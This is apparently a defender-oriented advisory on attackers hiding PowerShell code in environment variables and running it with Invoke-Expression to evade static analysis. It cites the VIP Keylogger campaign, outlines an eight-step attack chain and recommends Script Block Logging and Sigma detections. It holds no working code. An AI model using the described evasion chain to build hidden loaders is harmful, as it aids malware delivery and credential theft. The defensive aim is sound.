PowerShell Execution via Environment Variables

Attackers are increasingly leveraging PowerShell to execute malicious code embedded within environment variables. This method involves storing commands or encoded content in environment variables and then using Invoke-Expression (or its alias iex) to dynamically construct and execute code at runtime. This tactic is employed to evade traditional static analysis techniques and conceal the true intent of the executed code. Observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign, this technique is a significant threat. Defenders should be aware of this trend and implement appropriate detection mechanisms. The focus is on identifying PowerShell scripts that combine environment variable access ($env:) with Invoke-Expression or its aliases, based on PowerShell Script Block Logging (Event ID 4104).

Attack Chain

1. The attacker gains initial access to the system, possibly through phishing or exploiting a software vulnerability.
2. PowerShell is invoked, either directly or indirectly, via a script or another process.
3. The attacker sets an environment variable containing malicious code or a command. This might involve using [Environment]::SetEnvironmentVariable.
4. A PowerShell script is executed that reads the content of the environment variable using $env:.
5. The content read from the environment variable is passed to Invoke-Expression or its alias iex.
6. Invoke-Expression dynamically executes the code, effectively bypassing static analysis.
7. The executed code downloads and executes a secondary payload, such as a keylogger or a remote access tool.
8. The attacker achieves their objective, such as stealing credentials or establishing persistent access.

Impact

Successful exploitation can lead to the execution of arbitrary code on the compromised system, allowing attackers to install malware, steal sensitive data, or establish a persistent foothold. The VIP Keylogger campaign, for example, demonstrates how this technique can be used to harvest user credentials. Due to the obfuscated nature of this attack, it is difficult to detect and remediate, often leading to extended dwell time for the attacker. Compromised systems can be further used as a launchpad for attacks against other systems within the network.

Recommendation

• Enable PowerShell Script Block Logging (Event ID 4104) on all Windows systems to capture the de-obfuscated script blocks before execution.
• Deploy the provided Sigma rules to your SIEM to detect PowerShell scripts that access environment variables and use Invoke-Expression or its aliases. Tune these rules to your environment to reduce false positives.
• Investigate any alerts generated by these rules to determine if malicious activity is occurring.
• Monitor PowerShell execution for suspicious environment variable access and dynamic code execution.
• Implement application control to prevent the execution of unauthorized PowerShell scripts.
• Review and harden PowerShell execution policies to limit the attack surface.